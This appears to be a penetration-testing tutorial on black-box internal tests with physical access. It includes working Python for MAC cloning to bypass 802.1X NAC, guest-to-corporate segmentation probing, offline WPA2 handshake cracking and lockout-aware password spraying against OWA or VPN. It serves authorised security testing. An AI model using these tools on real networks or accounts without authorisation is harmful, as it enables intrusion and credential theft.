Real-Time BlackBox Internal Penetration Testing
This post covers how to gain access to the corporate network during a black-box internal penetration test (with physical access to the corporate office), organised around the following areas:
Assessment Process

Areas
Wired
RJ45 (Ethernet) Port
Wireless
Guest SSID
Contractor / Partner SSID
Corporate SSID
Unlocked/Unprotected/Unattended Devices and/or documents
Password Spraying (can be used for internal or external pentesting, depending on the attack vector)
Wired
NAC Testing
Device Testing (VoIP phones, printers, etc.)
Asset Discovery
Scanning & Enumeration
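As an added example (not code from the original post), the script below ties the wired steps together: it merges the output of `arp-scan` (MAC and vendor) with `nmap -oG` (open TCP ports) for the hosts seen from an RJ45 drop, classifies them, and picks out printers and VoIP phones. Those devices are usually exempted from 802.1X through MAC authentication bypass, so cloning one of their MAC addresses on the tester's interface is the standard NAC test. The two sample outputs are constructed, not a real capture, and the port-based classification heuristics are my own assumptions, not a rule from the post.

```python
# Added example (not from the original post): merge arp-scan and nmap -oG output
# from a wired drop, classify devices, and list MAC addresses worth cloning to
# get past a NAC that authenticates printers/VoIP phones by MAC (MAB).
import re

# Constructed sample output, not a real capture. Format follows
# `arp-scan --localnet`: <ip>\t<mac>\t<vendor>
ARP_SCAN_SAMPLE = """\
10.0.1.1\t00:11:22:33:44:01\tCisco Systems, Inc
10.0.1.20\t00:1b:78:aa:bb:cc\tHewlett Packard
10.0.1.31\t00:04:f2:12:34:56\tPolycom
10.0.1.55\t3c:97:0e:de:ad:01\tWistron InfoComm
"""

# Constructed sample in `nmap -oG` (grepable) format for the same hosts.
NMAP_GREPABLE_SAMPLE = """\
Host: 10.0.1.1 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: filtered (999)
Host: 10.0.1.20 ()\tPorts: 80/open/tcp//http///, 631/open/tcp//ipp///, 9100/open/tcp//jetdirect///\tIgnored State: closed (997)
Host: 10.0.1.31 ()\tPorts: 80/open/tcp//http///, 5060/open/tcp//sip///\tIgnored State: closed (998)
Host: 10.0.1.55 ()\tPorts: 135/open/tcp//msrpc///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (998)
"""

def parse_arp_scan(text):
    """Return {ip: (mac, vendor)} from arp-scan output; banner lines are skipped."""
    hosts = {}
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) == 3 and re.match(r"^\d+\.\d+\.\d+\.\d+$", parts[0]):
            hosts[parts[0]] = (parts[1].lower(), parts[2])
    return hosts

def parse_nmap_grepable(text):
    """Return {ip: [open tcp ports]} from the 'Host:' lines of nmap -oG output."""
    ports = {}
    for line in text.splitlines():
        m = re.match(r"^Host: (\S+) .*?Ports: (.*?)(?:\t|$)", line)
        if not m:
            continue
        ip, portlist = m.group(1), m.group(2)
        ports[ip] = [int(p.split("/")[0]) for p in portlist.split(", ")
                     if p.split("/")[1] == "open" and p.split("/")[2] == "tcp"]
    return ports

def classify(open_ports, vendor):
    """Rough device type from open ports (assumed heuristics), vendor as tie-breaker."""
    if 9100 in open_ports or 631 in open_ports:
        return "printer"
    if 5060 in open_ports or 5061 in open_ports or "polycom" in vendor.lower():
        return "voip"
    if 445 in open_ports or 135 in open_ports:
        return "windows-host"
    if 22 in open_ports and 80 not in open_ports:
        return "network-device"
    return "unknown"

def inventory(arp_text, nmap_text):
    """Join both sources on IP; a host seen by only one tool still appears."""
    arp, nm = parse_arp_scan(arp_text), parse_nmap_grepable(nmap_text)
    out = []
    for ip in sorted(set(arp) | set(nm), key=lambda s: tuple(map(int, s.split(".")))):
        mac, vendor = arp.get(ip, (None, ""))
        ports = nm.get(ip, [])
        out.append({"ip": ip, "mac": mac, "vendor": vendor, "ports": ports,
                    "type": classify(ports, vendor)})
    return out

def nac_bypass_candidates(inv):
    """Printers and phones are commonly exempted from 802.1X via MAC auth bypass,
    so their MACs are the ones to clone on the tester's interface."""
    return [h for h in inv if h["type"] in ("printer", "voip") and h["mac"]]

def spoof_commands(iface, mac):
    """Shell commands to clone a MAC. Unplug the real device first (or plug into
    its drop), otherwise the switch sees the address flap between two ports."""
    return [f"ip link set dev {iface} down",
            f"ip link set dev {iface} address {mac}",
            f"ip link set dev {iface} up",
            f"dhclient -v {iface}"]

if __name__ == "__main__":
    inv = inventory(ARP_SCAN_SAMPLE, NMAP_GREPABLE_SAMPLE)
    for h in inv:
        print(f'{h["ip"]:<12} {h["mac"] or "-":<18} {h["type"]:<14} {h["ports"]}')
    for c in nac_bypass_candidates(inv):
        print("\n".join(spoof_commands("eth0", c["mac"])))
```

Run it against the real `arp-scan --localnet` and `nmap -sS -oG` output for the drop you are on. If the port is 802.1X-enforced you will not get an address until the MAC is cloned, so arp-scan and the rest of the discovery are run from a second interface or from the phone's own drop.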
Wireless
Discovering Hidden Networks
Guest SSID Testing
Hunting for connected corporate users
Scanning APs & server subnets
Captive Portal Testing
Rogue access point
Segmentation Testing between guest & corporate network
Contractor / Partner SSID Testing
Connected users
Scanning AP & server subnets
Captive Portal Testing
Rogue access point
Segmentation Testing between contractor/partner network & corporate network
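The segmentation test in both the guest and the contractor/partner lists above comes down to the same check: from an address obtained on that SSID, can you complete a TCP handshake to anything in the corporate ranges? The script below is an added example (not the post's own code) of that check. The corporate ranges and the port list are assumptions to be replaced with the ranges in scope; the probe function is injectable so the logic can be exercised offline, and by default it makes real TCP connects.

```python
# Added example (not from the original post): probe corporate subnets from a
# guest or contractor SSID. A reachable AD/SMB/RDP port is a critical finding.
import socket
import ipaddress

# Assumed corporate ranges and the ports that matter most (SMB, RDP, LDAP,
# WinRM, HTTP). Replace with the real ranges in scope; small /30s keep the
# demo quick.
CORPORATE_RANGES = ["10.10.0.0/30", "10.20.5.0/30"]
PROBE_PORTS = [445, 3389, 389, 5985, 80]

def tcp_probe(ip, port, timeout=1.0):
    """Real probe: True if a TCP handshake completes (port open and routed)."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False

def segmentation_test(ranges, ports, probe=tcp_probe):
    """Return {ip: [open ports]} for every host with at least one reachable
    port. An empty result only shows the tested ranges/ports are unreachable
    over TCP; it says nothing about other ranges, UDP or ICMP."""
    findings = {}
    for cidr in ranges:
        for host in ipaddress.ip_network(cidr).hosts():
            ip = str(host)
            open_ports = [p for p in ports if probe(ip, p)]
            if open_ports:
                findings[ip] = open_ports
    return findings

def verdict(findings):
    """Map findings to the severity you would put in the report."""
    if not findings:
        return "isolated"
    if any(445 in p or 3389 in p or 389 in p for p in findings.values()):
        return "critical: guest segment can reach AD/SMB/RDP services"
    return "high: guest segment can reach corporate hosts"

if __name__ == "__main__":
    result = segmentation_test(CORPORATE_RANGES, PROBE_PORTS)
    print(result)
    print(verdict(result))
```

Run it once from the guest SSID and once from the contractor/partner SSID; the two segments are often firewalled differently. A 1-second timeout per port over large ranges is slow, so scope the ranges from the AP and server subnet scans rather than sweeping the whole RFC 1918 space.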
Corporate SSID Testing
Evil-Twin Attack
Handshake Capture
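A captured WPA2-PSK 4-way handshake is only useful once you can test passphrases against it offline. As an added example (not code from the original post or from the tools in the references), the block below implements that check from the standard: PMK from PBKDF2-HMAC-SHA1 over the passphrase and SSID, PTK from the 802.11 PRF-512 over the two MACs and two nonces, and the MIC of EAPOL message 2 as HMAC-SHA1 truncated to 16 bytes. Since no pcap is embedded, `simulate_capture` is a constructed stand-in that builds a handshake with random MACs and nonces and a dummy EAPOL body for a known passphrase; everything else is exactly what a cracker does with real captured values.

```python
# Added example (not from the original post): offline verification of WPA2-PSK
# candidates against a captured 4-way handshake (PMK -> PTK -> KCK -> MIC).
import hashlib
import hmac
import os

def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(key, label, data):
    """802.11 PRF-512: concat HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", Min(MACs)||Max(MACs)||Min(nonces)||Max(nonces))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck, eapol_zeroed):
    """WPA2 (AKM 00-0F-AC:2): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]

def crack(capture, wordlist):
    """Return the first passphrase whose derived MIC matches the captured one, else None.
    KCK is the first 16 bytes of the PTK."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return candidate
    return None

def simulate_capture(passphrase, ssid="CorpWiFi"):
    """Constructed stand-in for a real pcap: random MACs/nonces and a dummy
    EAPOL-Key message 2 body with the MIC computed from `passphrase`.
    With a real capture you take these fields from airodump/wireshark instead."""
    ap_mac, sta_mac = os.urandom(6), os.urandom(6)
    anonce, snonce = os.urandom(32), os.urandom(32)
    eapol = (b"\x01\x03\x00\x5f"            # 802.1X version, type EAPOL-Key, body length
             + b"\x02\x01\x0a\x00\x10"       # descriptor type, key info, key length (constructed)
             + b"\x00" * 7 + b"\x01"         # replay counter
             + snonce + b"\x00" * 32         # SNonce, then IV/RSC/ID all zero
             + b"\x00" * 16                  # MIC field zeroed for the calculation
             + b"\x00\x00")                  # key data length
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol)}

if __name__ == "__main__":
    cap = simulate_capture("Summer2019!")
    print(crack(cap, ["password", "Welcome1", "Summer2019!", "letmein"]))
```

The 4096-iteration PBKDF2 is the expensive step and is per SSID, which is why real cracking goes through hashcat on a GPU; this block is for understanding what the tool is checking, and for sanity-checking a handshake before you spend GPU time on it.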
Unlocked/Unprotected/Unattended Devices and/or documents
Unlocked computers/laptops
Unprotected/Unattended devices (e.g. digital signage screens connected to the network, kiosks, etc.)
Credentials on sticky notes
Password Spraying (weak password policy)
Running password spray against OWA/Exchange/office.com
Running password spray against VPN
Hint: Credentials obtained this way are especially valuable if they also authenticate to the corporate SSID
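Spraying against OWA or a VPN portal is only safe if the loop respects the domain's lockout policy: one password across every user per round, then wait out the observation window before the next one. The block below is an added example of that scheduling (my code, not MailSniper's or the post's). The authentication callback is injectable; in practice it would be the OWA/EWS or VPN login, and the threshold and window are assumptions to be replaced with the values from the target's password policy (`net accounts` or the Default Domain Policy, if you can read it).

```python
# Added example (not from the original post): a lockout-aware password spray.
# Each round tries one password against every remaining user, then sleeps for
# the observation window so no account reaches the lockout threshold.
import time

def seasonal_candidates(year):
    """Typical first-round guesses; extend with company name, months, etc."""
    return [f"{s}{year}{suffix}" for s in ("Spring", "Summer", "Autumn", "Winter")
            for suffix in ("", "!")]

def build_rounds(passwords, lockout_threshold, per_round=1):
    """Group passwords so each user sees at most `per_round` attempts within one
    observation window; keep that strictly below the lockout threshold."""
    if per_round >= lockout_threshold:
        raise ValueError("per_round must stay below the lockout threshold")
    return [passwords[i:i + per_round] for i in range(0, len(passwords), per_round)]

def spray(users, passwords, auth, lockout_threshold=5, observation_window=1800,
          per_round=1, sleep=time.sleep):
    """Try password rounds against all users. `auth(user, pw)` returns True on
    success. Returns (valid_credentials, attempts_per_user)."""
    valid, attempts = [], {u: 0 for u in users}
    pending = set(users)  # stop guessing an account once its password is found
    rounds = build_rounds(passwords, lockout_threshold, per_round)
    for n, batch in enumerate(rounds):
        for pw in batch:
            for user in sorted(pending):
                attempts[user] += 1
                if auth(user, pw):
                    valid.append((user, pw))
                    pending.discard(user)
        if n < len(rounds) - 1:
            sleep(observation_window)  # let the bad-password counter reset
    return valid, attempts

if __name__ == "__main__":
    # Constructed demo: a fake directory instead of a live OWA/VPN endpoint.
    fake_directory = {("alice", "Summer2019!"), ("bob", "Welcome1")}
    found, counts = spray(["alice", "bob", "carol"],
                          ["Welcome1"] + seasonal_candidates(2019),
                          auth=lambda u, p: (u, p) in fake_directory,
                          observation_window=0)
    print(found, counts)
```

Note that `attempts` is tracked per user so the report can state the maximum number of failures any account was exposed to; that figure, compared against the policy threshold, is what shows the spray stayed within the agreed rules of engagement.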
Reference
https://attack.mitre.org/tactics/enterprise/
https://www.sans.org/reading-room/whitepapers/auditing/conducting-penetration-test-organization-67
https://www.eccouncil.org/what-is-penetration-testing/
https://tools.kali.org/wireless-attacks/hostapd-wpe
https://blog.pentesteracademy.com/cracking-wpa2-psk-passphrase-in-absence-of-the-access-point-f63116970a48
https://github.com/dafthack/MailSniper